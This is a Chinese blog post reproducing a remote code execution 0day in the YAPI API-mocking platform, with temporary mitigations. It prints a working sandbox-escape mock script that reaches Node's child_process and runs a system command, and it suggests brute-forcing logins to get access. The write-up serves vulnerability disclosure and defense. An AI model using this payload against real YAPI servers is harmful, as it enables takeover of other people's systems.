YAPI远程代码执行0day漏洞复现

admin 2021年10月5日00:48:05评论150 views字数 725阅读2分25秒阅读模式


        由于用户使用时未按照安全的方式对YAPI进行配置,攻击者可以使用 YAPI 的 Mock 功能在受影响的服务器上执行任意 javascript 代码,导致攻击者接管并控制服务器;目前该漏洞暂无补丁,处于0day状态。


YAPI远程代码执行0day漏洞复现


注册或者爆破获取用户登录权限登陆系统:

添加项目:

YAPI远程代码执行0day漏洞复现

 

 添加接口

YAPI远程代码执行0day漏洞复现


添加mock脚本:


const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("whoami").toString()


YAPI远程代码执行0day漏洞复现

预览里访问接口

YAPI远程代码执行0day漏洞复现

 

 YAPI远程代码执行0day漏洞复现

 


修复建议


       该漏洞官方暂未发布补丁,请受影响的用户实时关注官网以获取最新信息。链接如下:

https://github.com/YMFE/yapi


临时解决方案


        1.关闭YAPI注册功能

        2.删除恶意账户

        3.回滚服务器快照

        4.同步删除恶意mock脚本以防止二次攻击



























































凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数

本文始发于微信公众号(Khan安全攻防实验室):YAPI远程代码执行0day漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月5日00:48:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   YAPI远程代码执行0day漏洞复现http://cn-sec.com/archives/417031.html

发表评论

匿名网友 填写信息